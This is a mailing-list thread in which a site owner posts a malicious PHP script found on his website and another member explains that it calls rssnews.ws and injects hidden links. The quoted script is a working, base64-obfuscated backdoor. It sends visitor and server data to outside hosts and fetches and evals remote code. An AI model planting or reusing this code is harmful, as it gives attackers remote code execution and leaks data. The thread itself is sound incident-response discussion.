I decoded some of the strings in the script and found
http://7.rssnews.ws
Googling for 7.rssnews.ws yields this discussion
http://forums.oscommerce.com/lofiversion/index.php?t301350.html
It's an OsCommerce forum but I don't think this is necessarily an
OsCommerce problem. You apparently have writable directory somewhere.
The code is used to add hidden links to pages.
Googling for rssnews.ws provides more links.
Timestamps and server logs will tell you more about what happened. If
you haven't done so already, you should notify your host.
Sheila
steve miller wrote:
Hello...
I just found a bad script on my website :(
Can anyone here tell me what they might have stolen?
Here is the script:
error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ?
$_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ?
$_SERVER["SERVER_NAME"] :
$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ?
$_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])
? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])
? $_SERVER["QUERY_STRING"] :
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ?
$_SERVER["HTTP_REFERER"] :
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ?
$_SERVER["HTTP_USER_AGENT"] :
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ?
$_SERVER["REMOTE_ADDR"] :
$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ?
$_SERVER["SCRIPT_FILENAME"] :
$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ?
$_SERVER["HTTP_ACCEPT_LANGUAGE"] :
$HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if
((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
else if
(include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str));else
if
($c=file_get_contents(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);};
____ The WDVL Discussion List from WDVL.COM ____
To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or
use the web interface http://e-newsletters.internet.com/discussionlists.html/
Send Your Posts To: [email protected]
To change subscription settings, add a password or view the web interface:
http://intm-dl.sparklist.com/read/?forum=wdvltalk
________________ http://www.wdvl.com _______________________
You are currently subscribed to wdvltalk as: [EMAIL PROTECTED]
To unsubscribe send a blank email to [EMAIL PROTECTED]
To unsubscribe via postal mail, please contact us at:
Jupitermedia Corp.
Attn: Discussion List Management
475 Park Avenue South
New York, NY 10016
Please include the email address which you have been contacted with.
